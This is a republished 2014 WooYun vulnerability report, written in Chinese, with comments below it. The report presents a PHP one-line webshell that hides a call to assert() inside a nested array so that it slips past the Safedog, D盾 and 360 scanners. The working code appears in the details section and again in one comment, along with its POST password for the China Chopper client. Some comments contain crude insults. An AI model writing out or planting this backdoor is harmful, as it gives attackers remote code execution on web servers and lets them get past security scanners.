过安全狗/D盾/360PHP一句话

admin
admin
admin
140816
文章
117
评论
2015年7月17日00:33:50评论314 views字数 239阅读0分47秒阅读模式
摘要

2014-10-23: 细节已通知厂商并且等待厂商处理中
2014-10-23: 厂商已查看当前漏洞内容,细节仅向厂商公开
2014-10-26: 厂商已经主动忽略漏洞,细节向公众公开

漏洞概要 关注数(33) 关注此漏洞

缺陷编号: WooYun-2014-79984

漏洞标题: 过安全狗/D盾/360PHP一句话

相关厂商: 安全狗/D盾/360

漏洞作者: whirlwind

提交时间: 2014-10-23 18:12

公开时间: 2014-10-26 18:14

漏洞类型: 设计缺陷/逻辑错误

危害等级: 高

自评Rank: 10

漏洞状态: 已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 逻辑错误

3人收藏

漏洞详情

披露状态:

2014-10-23: 细节已通知厂商并且等待厂商处理中
2014-10-23: 厂商已查看当前漏洞内容,细节仅向厂商公开
2014-10-26: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

他们不认识二维数组。。

详细说明:

code 区域 
<?php 
 $item['wind'] = 'assert'; 
 $array[] = $item; 
 $array[0]['wind']($_POST['whirlwind']);  //密码whirlwind 菜刀 
 ?>

漏洞证明:

过安全狗/D盾/360PHP一句话

修复方案:

不会 没学过CPP

版权声明:转载请注明来源 whirlwind@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-10-26 18:14

厂商回复:

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(少于3人评价):

登陆后才能进行评分

100%

0%

0%

0%

0%

评价

  1. 2014-10-21 18:13 | 子非海绵宝宝 过安全狗/D盾/360PHP一句话 ( 核心白帽子 | Rank:1413 漏洞数:148 | 发扬海绵宝宝的精神! 你不是海绵宝宝,你怎...)

    1

    这不是在zone发过了么?

  2. 2014-10-21 18:28 | 0x7575 ( 实习白帽子 | Rank:62 漏洞数:16 )

    1

    <?php $item['wind'] = 'assert'; $array[] = $item; $array[0]['wind']($_POST['whirlwind']); //密码whirlwind 菜刀 ?> 麻痹的 最讨厌这种傻逼了 还匿名提交!

  3. 2014-10-21 18:39 | 玉林嘎 过安全狗/D盾/360PHP一句话 ( 普通白帽子 | Rank:941 漏洞数:108 )

    1

    之前不是早知道了嘛

  4. 2014-10-21 18:42 | ′ 雨。 过安全狗/D盾/360PHP一句话 ( 普通白帽子 | Rank:1332 漏洞数:198 | Only Code Never Lie To Me.)

    0

    。。这也能首页? 只要能过这三个的马儿都能首页不?

  5. 2014-10-21 19:44 | 大大灰狼 ( 普通白帽子 | Rank:278 漏洞数:64 | Newbie)

    0

    路过

  6. 2014-10-21 19:58 | phith0n 过安全狗/D盾/360PHP一句话 ( 普通白帽子 | Rank:834 漏洞数:127 | 一个想当文人的黑客~)

    0

    @′ 雨。 我也要首页我也要首页~~

  7. 2014-10-21 20:15 | pigzhu ( 路人 | Rank:4 漏洞数:4 | 网络共享!)

    0

    这个在zone 早有了。还冒头。。。

  8. 2014-10-21 22:46 | xsser 过安全狗/D盾/360PHP一句话 ( 普通白帽子 | Rank:297 漏洞数:22 | 当我又回首一切,这个世界会好吗?)

    0

    @0x7575 提交者作者本人

  9. 2014-10-21 23:17 | 狂人 ( 实习白帽子 | Rank:88 漏洞数:13 | Rank:999999999 漏洞数:999999999 | 小学生...)

    0

    这都可以首页?

  10. 2014-10-22 00:42 | 0x7575 ( 实习白帽子 | Rank:62 漏洞数:16 )

    0

    @xsser 哦哦 作者本人就不吐槽了 可是 你匿名干啥啊。真是的

  11. 2014-10-22 22:15 | whirlwind ( 实习白帽子 | Rank:40 漏洞数:11 | 极光肖风)

    0

    @0x7575 我骗点WB容易么,,,看着路人甲好玩啊。。

  12. 2014-10-22 22:17 | whirlwind ( 实习白帽子 | Rank:40 漏洞数:11 | 极光肖风)

    0

    @0x7575 @xsser 其实这个顶多过下静态扫描,,动态秒杀,,大牛给我讲D盾动态,听得我云里雾里的,,搞了半天,,其实跟IDS与防火墙联动差不多。。。

  13. 2014-10-22 22:52 | 0x7575 ( 实习白帽子 | Rank:62 漏洞数:16 )

    0

    @whirlwind ....我以为是别人发的 所以忍不住吐槽这种人

  14. 2014-10-27 01:13 | 龍 、 ( 普通白帽子 | Rank:474 漏洞数:163 | 你若安好 我就是晴天)

    0

    路过

  15. 2014-10-27 17:40 | cmdshell ( 实习白帽子 | Rank:40 漏洞数:9 )

    0

    死贱人,提交你妈比啊

  16. 2014-10-27 18:07 | ′ 雨。 过安全狗/D盾/360PHP一句话 ( 普通白帽子 | Rank:1332 漏洞数:198 | Only Code Never Lie To Me.)

    0

    @cmdshell 是你发现的?

  17. 2015-08-18 21:21 | Safe ( 路人 | Rank:0 漏洞数:1 | 一个平凡的人)

    0

    好用吗

  18. 2016-03-17 12:38 | Hero ( 普通白帽子 | Rank:162 漏洞数:53 | 药药切克闹,充气娃娃迷幻药)

    1

    发现一个不礼貌的评论者

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin